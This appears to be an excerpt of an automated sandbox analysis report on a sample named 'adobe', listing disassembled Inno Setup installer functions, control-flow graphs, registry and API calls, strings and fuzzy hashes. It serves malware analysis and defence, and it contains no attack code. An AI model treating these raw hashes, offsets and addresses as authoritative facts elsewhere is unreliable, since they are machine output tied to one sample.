                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: NameUser
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2645101109-0
                                                                                                                                                          • Opcode ID: 9bd4b3c3cd93b33f15f41ddc4070b4672062d5f2504028d60e03be6cf849f481
                                                                                                                                                          • Instruction ID: c04b0fe41e9d582a91f18bf87f4876ef3bc983a53d138609a9f38525333297d5
                                                                                                                                                          • Opcode Fuzzy Hash: 9bd4b3c3cd93b33f15f41ddc4070b4672062d5f2504028d60e03be6cf849f481
                                                                                                                                                          • Instruction Fuzzy Hash: 12D01D7574420067D700AAA9AC81696758D4784315F00453F7DC5DA2C3F5BDDA885656
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0042F394 Relevance: 1.5, APIs: 1, Instructions: 17nativeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F3B0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: NtdllProc_Window
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4255912815-0
                                                                                                                                                          • Opcode ID: 463407ea8ab64360e41f6c039c0e682b96e3ddf2f94f44b918dd9fba9020941f
                                                                                                                                                          • Instruction ID: f6c568c4939315a2eda578795105166964a56c952c5b5facb2271ccc97efa3bd
                                                                                                                                                          • Opcode Fuzzy Hash: 463407ea8ab64360e41f6c039c0e682b96e3ddf2f94f44b918dd9fba9020941f
                                                                                                                                                          • Instruction Fuzzy Hash: B8D05E7221010D6B8B00DE99D840C6F33AC9B88700BA08825F948C7205C634EC108BA4
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0046E1D0 Relevance: 72.2, APIs: 1, Strings: 40, Instructions: 488registryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 406 46e1d0-46e202 407 46e204-46e20b 406->407 408 46e21f 406->408 409 46e216-46e21d 407->409 410 46e20d-46e214 407->410 411 46e226-46e25e call 403634 call 403738 call 42dde8 408->411 409->411 410->408 410->409 418 46e260-46e274 call 403738 call 42dde8 411->418 419 46e279-46e2a2 call 403738 call 42dd0c 411->419 418->419 427 46e2a4-46e2ad call 46dea0 419->427 428 46e2b2-46e2db call 46dfbc 419->428 427->428 432 46e2ed-46e2f0 call 403400 428->432 433 46e2dd-46e2eb call 403494 428->433 437 46e2f5-46e340 call 46dfbc call 42c40c call 46e004 call 46dfbc 432->437 433->437 446 46e356-46e377 call 454ac8 call 46dfbc 437->446 447 46e342-46e355 call 46e02c 437->447 454 46e3cd-46e3d4 446->454 455 46e379-46e3cc call 46dfbc call 478648 call 46dfbc call 478648 call 46dfbc 446->455 447->446 456 46e3d6-46e413 call 478648 call 46dfbc call 478648 call 46dfbc 454->456 457 46e414-46e41b 454->457 455->454 456->457 461 46e45c-46e481 call 40b44c call 46dfbc 457->461 462 46e41d-46e45b call 46dfbc * 3 457->462 481 46e483-46e48e call 47af6c 461->481 482 46e490-46e499 call 403494 461->482 462->461 491 46e49e-46e4a9 call 477a20 481->491 482->491 496 46e4b2 491->496 497 46e4ab-46e4b0 491->497 498 46e4b7-46e681 call 403778 call 46dfbc call 47af6c call 46e004 call 403494 call 40357c * 2 call 46dfbc call 403494 call 40357c * 2 call 46dfbc call 47af6c call 46e004 call 47af6c call 46e004 call 47af6c call 46e004 call 47af6c call 46e004 call 47af6c call 46e004 call 47af6c call 46e004 call 47af6c call 46e004 call 47af6c call 46e004 call 47af6c call 46e004 call 47af6c 496->498 497->498 561 46e697-46e6a5 call 46e02c 498->561 562 46e683-46e695 call 46dfbc 498->562 566 46e6aa 561->566 567 46e6ab-46e6f4 call 46e02c call 46e060 call 46dfbc call 47af6c call 46e0c4 562->567 566->567 578 46e6f6-46e714 call 46e02c * 2 567->578 579 46e71a-46e724 567->579 592 46e719 578->592 581 46e72a-46e731 579->581 582 46e7c8-46e7cf 579->582 584 46e795-46e7a0 581->584 585 46e733-46e757 call 430a40 581->585 586 46e7d1-46e807 call 493350 582->586 587 46e829-46e83f RegCloseKey 582->587 589 46e7a3-46e7a7 584->589 585->589 597 46e759-46e75a 585->597 586->587 589->582 593 46e7a9-46e7c2 call 430a7c call 46e02c 589->593 592->579 602 46e7c7 593->602 599 46e75c-46e782 call 40b44c call 47824c 597->599 606 46e784-46e78a call 430a40 599->606 607 46e78f-46e791 599->607 602->582 606->607 607->599 609 46e793 607->609 609->589
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0046DFBC: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,;QG,?,0049B178,?,0046E2D3,?,00000000,0046E840,?,_is1), ref: 0046DFDF
                                                                                                                                                          • RegCloseKey.ADVAPI32(?,0046E847,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046E892,?,?,0049B178,00000000), ref: 0046E83A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseValue
                                                                                                                                                          • String ID: " /SILENT$5.4.3 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                                                                                                          • API String ID: 3132538880-3969937391
                                                                                                                                                          • Opcode ID: 71cb03abd63313f9dd43a257b28192861709127c35ac81f9101227a176b76bdc
                                                                                                                                                          • Instruction ID: 7ce0d42d35b6fb1533783e616244207f763d0b1565f0a99f2df142306da66e40
                                                                                                                                                          • Opcode Fuzzy Hash: 71cb03abd63313f9dd43a257b28192861709127c35ac81f9101227a176b76bdc
                                                                                                                                                          • Instruction Fuzzy Hash: BB122238A001089FDB14DB96E981ADE73F5EF48704F20847BE8056B395EB79AD41CB5E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00490E9C Relevance: 56.4, APIs: 16, Strings: 16, Instructions: 431sleepCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1024 490e9c-490ed0 call 403684 1027 490ed2-490ee1 call 4467f0 Sleep 1024->1027 1028 490ee6-490ef3 call 403684 1024->1028 1033 491376-491390 call 403420 1027->1033 1034 490f22-490f2f call 403684 1028->1034 1035 490ef5-490f1d call 44684c call 403738 FindWindowA call 446acc 1028->1035 1043 490f5e-490f6b call 403684 1034->1043 1044 490f31-490f54 call 44684c call 403738 FindWindowA call 446acc 1034->1044 1035->1033 1052 490f6d-490faf call 4467f0 * 4 SendMessageA call 446acc 1043->1052 1053 490fb4-490fc1 call 403684 1043->1053 1061 490f59 1044->1061 1052->1033 1062 491010-49101d call 403684 1053->1062 1063 490fc3-49100b call 4467f0 * 4 PostMessageA call 446924 1053->1063 1061->1033 1071 49106c-491079 call 403684 1062->1071 1072 49101f-491067 call 4467f0 * 4 SendNotifyMessageA call 446924 1062->1072 1063->1033 1084 49107b-4910a1 call 44684c call 403738 RegisterClipboardFormatA call 446acc 1071->1084 1085 4910a6-4910b3 call 403684 1071->1085 1072->1033 1084->1033 1099 4910b5-4910ef call 4467f0 * 3 SendMessageA call 446acc 1085->1099 1100 4910f4-491101 call 403684 1085->1100 1099->1033 1112 491148-491155 call 403684 1100->1112 1113 491103-491143 call 4467f0 * 3 PostMessageA call 446924 1100->1113 1124 49119c-4911a9 call 403684 1112->1124 1125 491157-491197 call 4467f0 * 3 SendNotifyMessageA call 446924 1112->1125 1113->1033 1137 4911ab-4911c9 call 44684c call 42e2bc 1124->1137 1138 4911fe-49120b call 403684 1124->1138 1125->1033 1156 4911db-4911e9 GetLastError call 446acc 1137->1156 1157 4911cb-4911d9 call 446acc 1137->1157 1149 49120d-491239 call 44684c call 403738 call 4467f0 GetProcAddress 1138->1149 1150 491285-491292 call 403684 1138->1150 1181 49123b-491270 call 4467f0 * 2 call 446acc call 446924 1149->1181 1182 491275-491280 call 446924 1149->1182 1162 4912ba-4912c7 call 403684 1150->1162 1163 491294-4912b5 call 4467f0 FreeLibrary call 446924 1150->1163 1168 4911ee-4911f9 call 446acc 1156->1168 1157->1168 1177 4912c9-4912e7 call 44684c call 403738 CreateMutexA 1162->1177 1178 4912ec-4912f9 call 403684 1162->1178 1163->1033 1168->1033 1177->1033 1190 4912fb-49132d call 48b088 call 403574 call 403738 OemToCharBuffA call 48b0a0 1178->1190 1191 49132f-49133c call 403684 1178->1191 1181->1033 1182->1033 1190->1033 1200 49133e-491370 call 48b088 call 403574 call 403738 CharToOemBuffA call 48b0a0 1191->1200 1201 491372 1191->1201 1200->1033 1201->1033
                                                                                                                                                          APIs
                                                                                                                                                          • Sleep.KERNEL32(00000000,00000000,00491391,?,?,?,?,00000000,00000000,00000000), ref: 00490EDC
                                                                                                                                                          • FindWindowA.USER32(00000000,00000000), ref: 00490F0D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FindSleepWindow
                                                                                                                                                          • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                                                                                                          • API String ID: 3078808852-3310373309
                                                                                                                                                          • Opcode ID: deb64d7bf062bf764ec33933c26c98728080b6f03e9b990a67158d2513095a52
                                                                                                                                                          • Instruction ID: 8c5c55a42f08b3608b522ebaba4d0d27a092f0c69c6fcde6237b95dd3cfeca8d
                                                                                                                                                          • Opcode Fuzzy Hash: deb64d7bf062bf764ec33933c26c98728080b6f03e9b990a67158d2513095a52
                                                                                                                                                          • Instruction Fuzzy Hash: 66C188A0B0060267EB14BB3E8C92A1E59999FC9708B11D93FF406EB79ADE3DDC05435D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00481FF4 Relevance: 26.3, APIs: 9, Strings: 6, Instructions: 68libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1578 481ff4-482019 GetModuleHandleA GetProcAddress 1579 48201b-482031 GetNativeSystemInfo GetProcAddress 1578->1579 1580 482080-482085 GetSystemInfo 1578->1580 1581 48208a-482093 1579->1581 1582 482033-48203e GetCurrentProcess 1579->1582 1580->1581 1583 4820a3-4820aa 1581->1583 1584 482095-482099 1581->1584 1582->1581 1591 482040-482044 1582->1591 1585 4820c5-4820ca 1583->1585 1587 48209b-48209f 1584->1587 1588 4820ac-4820b3 1584->1588 1589 4820a1-4820be 1587->1589 1590 4820b5-4820bc 1587->1590 1588->1585 1589->1585 1590->1585 1591->1581 1593 482046-48204d call 451d8c 1591->1593 1593->1581 1596 48204f-48205c GetProcAddress 1593->1596 1596->1581 1597 48205e-482075 GetModuleHandleA GetProcAddress 1596->1597 1597->1581 1598 482077-48207e 1597->1598 1598->1581
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00482005
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00482012
                                                                                                                                                          • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00482020
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00482028
                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00482034
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00482055
                                                                                                                                                          • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00482068
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0048206E
                                                                                                                                                          • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00482085
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                                                                                          • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                                                                                          • API String ID: 2230631259-2623177817
                                                                                                                                                          • Opcode ID: 9d65caac548fd2376db6168583ed562a4a671010de9918fa7f66a3b614eabcf7
                                                                                                                                                          • Instruction ID: 17f89ef16513d558d40e50a148d83660b0106b55f934bc3655b4eb6cfd74668a
                                                                                                                                                          • Opcode Fuzzy Hash: 9d65caac548fd2376db6168583ed562a4a671010de9918fa7f66a3b614eabcf7
                                                                                                                                                          • Instruction Fuzzy Hash: CA11AFB5009702D9CA2073754E49B6F29888B13714F180D3B6E8076283CAFD8844DB7F
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00472878 Relevance: 25.1, APIs: 9, Strings: 5, Instructions: 585registryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1599 472878-4728ab 1600 472f96-472fca call 46d63c call 403400 * 2 call 403420 1599->1600 1601 4728b1-4728b5 1599->1601 1602 4728bc-4728f9 call 40b44c call 47824c 1601->1602 1613 4728ff-47293e call 47c8d4 call 477ec0 call 47af6c * 2 1602->1613 1614 472f8a-472f90 1602->1614 1625 472944-47294b 1613->1625 1626 472940 1613->1626 1614->1600 1614->1602 1627 472964-47297d 1625->1627 1628 47294d-472954 1625->1628 1626->1625 1631 4729a3-4729aa 1627->1631 1632 47297f-472989 call 4726a8 1627->1632 1629 472956-47295b call 4529b4 1628->1629 1630 472960 1628->1630 1629->1630 1630->1627 1633 4729ac-4729b3 1631->1633 1634 4729b9-4729c0 1631->1634 1632->1631 1643 47298b-47299e call 403738 call 42dde8 1632->1643 1633->1634 1637 472e67-472e9d 1633->1637 1638 472a13-472a33 call 4726cc 1634->1638 1639 4729c2-4729c9 1634->1639 1637->1627 1646 472ea3-472eaa 1637->1646 1650 472aa6-472aad 1638->1650 1651 472a35-472a5a call 403738 call 42dd0c 1638->1651 1639->1638 1642 4729cb-4729ed call 403738 call 42dd44 1639->1642 1642->1637 1677 4729f3-472a0e call 403738 RegDeleteValueA RegCloseKey 1642->1677 1643->1631 1652 472edd-472ee4 1646->1652 1653 472eac-472eb6 call 4726a8 1646->1653 1661 472af6 1650->1661 1662 472aaf-472ad3 call 403738 call 42dd44 1650->1662 1681 472a5f-472a63 1651->1681 1659 472f17-472f1e 1652->1659 1660 472ee6-472ef0 call 4726a8 1652->1660 1653->1652 1676 472eb8-472ed8 call 459bd4 1653->1676 1664 472f20-472f46 call 459bd4 1659->1664 1665 472f4b-472f52 1659->1665 1660->1659 1688 472ef2-472f12 call 459bd4 1660->1688 1669 472afb-472afd 1661->1669 1662->1669 1699 472ad5-472ad8 1662->1699 1664->1665 1674 472f54-472f7a call 459bd4 1665->1674 1675 472f7f-472f85 call 477eec 1665->1675 1669->1637 1678 472b03-472b18 1669->1678 1674->1675 1675->1614 1676->1652 1677->1637 1686 472b2c-472b33 1678->1686 1687 472b1a-472b27 call 403738 RegDeleteValueA 1678->1687 1693 472a65-472a69 1681->1693 1694 472a8a-472a91 1681->1694 1689 472e49-472e5f RegCloseKey 1686->1689 1690 472b39-472b40 1686->1690 1687->1686 1688->1659 1697 472b42-472b56 call 403738 call 42dc8c 1690->1697 1698 472b5c-472b69 1690->1698 1693->1669 1700 472a6f-472a88 call 4726cc 1693->1700 1694->1669 1701 472a93-472aa4 call 46dea0 1694->1701 1697->1689 1697->1698 1698->1689 1705 472b6f 1698->1705 1699->1669 1704 472ada-472ae1 1699->1704 1700->1669 1701->1669 1704->1669 1709 472ae3-472af4 call 46dea0 1704->1709 1705->1689 1710 472d96-472db1 call 47af6c call 430acc 1705->1710 1711 472d34-472d6d call 47af6c call 406da0 call 403738 RegSetValueExA 1705->1711 1712 472b92-472b9c 1705->1712 1713 472dfb-472e2d call 403574 call 403738 * 2 RegSetValueExA 1705->1713 1709->1669 1745 472db3-472db8 call 4529b4 1710->1745 1746 472dbd-472ddd call 403738 RegSetValueExA 1710->1746 1711->1689 1757 472d73-472d7a 1711->1757 1719 472ba5-472baa 1712->1719 1720 472b9e-472ba1 1712->1720 1713->1689 1761 472e2f-472e36 1713->1761 1729 472bb1-472bb3 1719->1729 1726 472ba3 1720->1726 1727 472bac 1720->1727 1726->1729 1727->1729 1734 472c50-472c62 call 40385c 1729->1734 1735 472bb9-472bcb call 40385c 1729->1735 1752 472c64-472c7b call 403738 call 42dc80 1734->1752 1753 472c7d-472c80 call 403400 1734->1753 1748 472be6-472be9 call 403400 1735->1748 1749 472bcd-472be4 call 403738 call 42dc74 1735->1749 1745->1746 1746->1689 1764 472ddf-472de6 1746->1764 1767 472bee-472bf5 1748->1767 1749->1748 1749->1767 1752->1753 1768 472c85-472cbe call 47af8c 1752->1768 1753->1768 1757->1689 1765 472d80-472d91 call 46dea0 1757->1765 1761->1689 1762 472e38-472e44 call 46dea0 1761->1762 1762->1689 1764->1689 1771 472de8-472df9 call 46dea0 1764->1771 1765->1689 1774 472bf7-472c15 call 403738 RegQueryValueExA 1767->1774 1775 472c26-472c4b call 47af8c 1767->1775 1787 472cc0-472cd0 call 403574 1768->1787 1788 472cdf-472d0b call 403574 call 403738 * 2 RegSetValueExA 1768->1788 1771->1689 1774->1775 1791 472c17-472c1b 1774->1791 1775->1788 1787->1788 1796 472cd2-472cda call 40357c 1787->1796 1788->1689 1802 472d11-472d18 1788->1802 1794 472c23 1791->1794 1795 472c1d-472c21 1791->1795 1794->1775 1795->1775 1795->1794 1796->1788 1802->1689 1803 472d1e-472d2f call 46dea0 1802->1803 1803->1689
                                                                                                                                                          APIs
                                                                                                                                                          • RegDeleteValueA.ADVAPI32(?,00000000,?,00000002,00000000,00000000,00472E71,?,?,?,?,00000000,00472FCB,?,?,0049B178), ref: 00472A00
                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000000,?,00000002,00000000,00000000,00472E71,?,?,?,?,00000000,00472FCB,?,?), ref: 00472A09
                                                                                                                                                            • Part of subcall function 004726CC: GetLastError.KERNEL32(00000000,00000000,00000000,004727A0,?,?,0049B178,00000000), ref: 00472759
                                                                                                                                                          • RegDeleteValueA.ADVAPI32(?,00000000,00000000,00472E60,?,?,00000000,00472E71,?,?,?,?,00000000,00472FCB,?,?), ref: 00472B27
                                                                                                                                                            • Part of subcall function 0042DD0C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
                                                                                                                                                            • Part of subcall function 004726CC: GetLastError.KERNEL32(00000000,00000000,00000000,004727A0,?,?,0049B178,00000000), ref: 0047276F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DeleteErrorLastValue$CloseCreate
                                                                                                                                                          • String ID: Cannot access 64-bit registry keys on this version of Windows$Failed to parse "qword" value$break$olddata${olddata}
                                                                                                                                                          • API String ID: 2638610037-3092547568
                                                                                                                                                          • Opcode ID: 1a1a9a2af84ad15ec946c7ce9a812c5d1000eb2646b86bb23b767eeb733683ad
                                                                                                                                                          • Instruction ID: a30fa448762fd9b92e1b54667286fa41a8687ddbeb41c1c5d6153ad75513ee7b
                                                                                                                                                          • Opcode Fuzzy Hash: 1a1a9a2af84ad15ec946c7ce9a812c5d1000eb2646b86bb23b767eeb733683ad
                                                                                                                                                          • Instruction Fuzzy Hash: 7B32FC74E00248AFDB15DFA9D581BDEB7F4AF08304F448066F914AB3A2CB78AD45CB59
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004685C4 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 155registryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1806 4685c4-4685fc call 47af6c 1809 468602-468612 call 477a40 1806->1809 1810 4687de-4687f8 call 403420 1806->1810 1815 468617-46865c call 4078fc call 403738 call 42dd44 1809->1815 1821 468661-468663 1815->1821 1822 4687d4-4687d8 1821->1822 1823 468669-46867e 1821->1823 1822->1810 1822->1815 1824 468693-46869a 1823->1824 1825 468680-46868e call 42dc74 1823->1825 1827 4686c7-4686ce 1824->1827 1828 46869c-4686be call 42dc74 call 42dc8c 1824->1828 1825->1824 1830 468727-46872e 1827->1830 1831 4686d0-4686f5 call 42dc74 * 2 1827->1831 1828->1827 1847 4686c0 1828->1847 1833 468774-46877b 1830->1833 1834 468730-468742 call 42dc74 1830->1834 1851 4686f7-468700 call 47873c 1831->1851 1852 468705-468717 call 42dc74 1831->1852 1837 4687b6-4687cc RegCloseKey 1833->1837 1838 46877d-4687b1 call 42dc74 * 3 1833->1838 1848 468744-46874d call 47873c 1834->1848 1849 468752-468764 call 42dc74 1834->1849 1838->1837 1847->1827 1848->1849 1849->1833 1859 468766-46876f call 47873c 1849->1859 1851->1852 1852->1830 1863 468719-468722 call 47873c 1852->1863 1859->1833 1863->1830
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60
                                                                                                                                                          • RegCloseKey.ADVAPI32(?,004687DE,?,?,00000001,00000000,00000000,004687F9,?,00000000,00000000,?), ref: 004687C7
                                                                                                                                                          Strings
                                                                                                                                                          • Inno Setup: Selected Tasks, xrefs: 00468733
                                                                                                                                                          • Inno Setup: App Path, xrefs: 00468686
                                                                                                                                                          • Inno Setup: User Info: Organization, xrefs: 00468796
                                                                                                                                                          • %s\%s_is1, xrefs: 00468641
                                                                                                                                                          • Inno Setup: User Info: Name, xrefs: 00468783
                                                                                                                                                          • Inno Setup: User Info: Serial, xrefs: 004687A9
                                                                                                                                                          • Inno Setup: Deselected Components, xrefs: 00468708
                                                                                                                                                          • Inno Setup: Deselected Tasks, xrefs: 00468755
                                                                                                                                                          • Inno Setup: Icon Group, xrefs: 004686A2
                                                                                                                                                          • Inno Setup: Setup Type, xrefs: 004686D6
                                                                                                                                                          • Inno Setup: No Icons, xrefs: 004686AF
                                                                                                                                                          • Inno Setup: Selected Components, xrefs: 004686E6
                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468623
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
